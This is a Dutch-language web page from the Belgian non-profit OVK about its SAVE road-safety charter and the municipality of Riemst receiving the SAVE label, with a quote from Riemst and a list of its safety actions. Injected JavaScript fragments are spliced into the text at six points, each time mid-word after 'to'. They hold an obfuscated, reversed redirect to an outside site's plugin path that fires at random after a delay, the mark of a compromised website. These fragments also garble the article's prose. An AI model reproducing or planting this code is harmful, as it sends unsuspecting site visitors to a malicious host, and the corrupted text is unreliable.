Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Riemst ontvangt het SAVE-label

In het mei 2012 ondertekende Riemst het charter en het actiejaar ging daarna van start. Het liet wat op zich wachten maar 16 maart was het zover: een eerste bekroning van het werk, de uitreiking van het SAVE label. Ze zijn ondertussen de 8e stad of gemeente die het label ontvangt en de eerste in Limburg.

Riemst verwoordt wat dit label voor hen betekent als volgt:

“De uitreiking van het SAVE-label is voor Riemst een mooie beloning, maar vooral een teken dat we op de goede weg zijn. Elk verkeersslachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffer is er één teveel en noopt ons ertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe om nog beter te doen. Samen met de begeleiding van OVK  hebben we onze inspanningen rondom verkeersveiligheid gehandhaafd en waar mogelijk nog verbeterd om te komen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot het resultaat van nu. We blijven echter streven naar een marge van 0 slachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffers, en zolang we deze niet halen zullen we blijven inzetten op verkeersveiligheid.”

Enkele acties die Riemst verwezenlijkte in hun eerste SAVE-actiejaar zijn:

  • Het ‘stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepenplan’ en het project ‘groene poorten’.
  • Het project trage wegen. In de huidige bbc is er een jaarlijks bedrag opgenomen om deze trage wegen te onderhouden en om er elk jaar nog bijkomende terug in ere te herstellen, of om er nieuwe te realiseren. Er wordt over alle diensten heen geïntegreerd gewerkt aan trage wegen. Riemst spreekt zelf van een soort ‘trage wegen-reflex’ die er bij iedereen moest komen.
  • De contacten met de scholen/ouders verbeteren. Ze hebben verkeerslessen die worden aangeboden aan de scholen. Daarnaast zijn er contacten met de directie om de schoolomgevingen zo verkeersvriendelijk te maken voor de zwakke weggebruiker. Ook werden de schoolvervoersplannen onder de loep genomen. Bovendien ijvert Riemst ervoor om diegenen die op een duurzame manier komen naar de scholen te belonen.
  • Hoog handhavingsniveau: bij grote evenementen is er steeds aanwezigheid van de politie om de overlast op gebied van geparkeerde wagens te verlagen. Eveneens zetten ze zwaar in op controles tegen het stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepparkeren daar dit probleem de veiligheid van de zwakke weggebruiker rechtstreeks in het gedrang brengt.

Deze uitreiking werd in beeld gebracht door TV Limburg en is te bekijken via deze link: SAVE-uitreiking Riemst in beeld


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be